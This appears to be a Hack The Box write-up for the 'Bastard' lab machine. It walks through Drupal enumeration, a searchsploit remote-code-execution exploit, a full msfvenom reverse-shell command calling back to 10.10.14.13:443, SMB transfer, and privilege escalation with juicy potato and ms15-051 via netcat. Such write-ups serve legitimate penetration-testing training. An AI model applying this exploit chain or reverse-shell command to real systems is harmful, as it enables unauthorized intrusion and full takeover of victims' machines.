HTB: Bastard Writeup w/o Metasploit
Recon
Nmap scans show that this box has 3 ports open. The port that looks the most interesting is port 80 and is what we will use to get our first shell.
Enumeration
Nmap shows that this service is powered by Drupal, which has a boat load of vulnerabilities. You can read more about them here. The nmap output also shows some entries in the robots.txt file. This file is used to tell web crawlers what urls to avoid and not scan. The most interesting url here is the Changelog.txt. Browsing to 10.10.10.9/CHANGELOG.txt shows the latest version of Drupal this service may be running.
This is useful information for us to enumerate further. Using searchsploit we find a few exploits targeting this version of Drupal.
The one that worked for me (I tried them one at a time from top to bottom), was the third one from the top (44449.rb). This exploit appears to be looking for unauthenticated paths/forms to execute some remote code via php. I did have to run “gem install require” and “gem install highline” to get this ruby script to work. Once those were installed, I was able to run it and receive a shell.
I believe you can use this current shell to enumerate for other vulnerabilities to escalate privileges. Nonetheless, in my video walkthrough we open up another shell we created with msfvenom. We created a shell.exe using msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.13 lport=443 -f exe -o shell.exe.
Afterwards we started up a smbserver and copied the shell over to our victim box, then executed it. You can see this below.
Using this shell (top right in picture above) is easier to navigate through directories.
Privilege Escalation
If you have watched the walkthrough, you will see that there are many exploits to escalate privileges on this box. After running the systeminfo command, this box does not appear to have any patches installed.
So we can use different exploits to escalate our privileges. One exploit we could use is the juicy potato exploit since we have special privileges to create and impersonate tokens.
You will just have to use the right CSLID for the server. You can find them here. I used the second one to get the juicy potato exploit to work. If you’re not familiar with it please check out my devel writeup here. For this box (bastard), we are going to try a different exploit. It is ms15–051. You can find the executable within the zip files here.
This exploit abuses a vulnerability that allows code execution in kernel mode. The executable files we download from that git repo, will run commands for us with elevated privileges. So, we will use it to run a netcat command to connect back to our listener.
Conclusion
Now that we have system level access, we can go and capture root and user flags. Thanks for reading my write up. Here is a video walkthrough for this. Please follow for more!
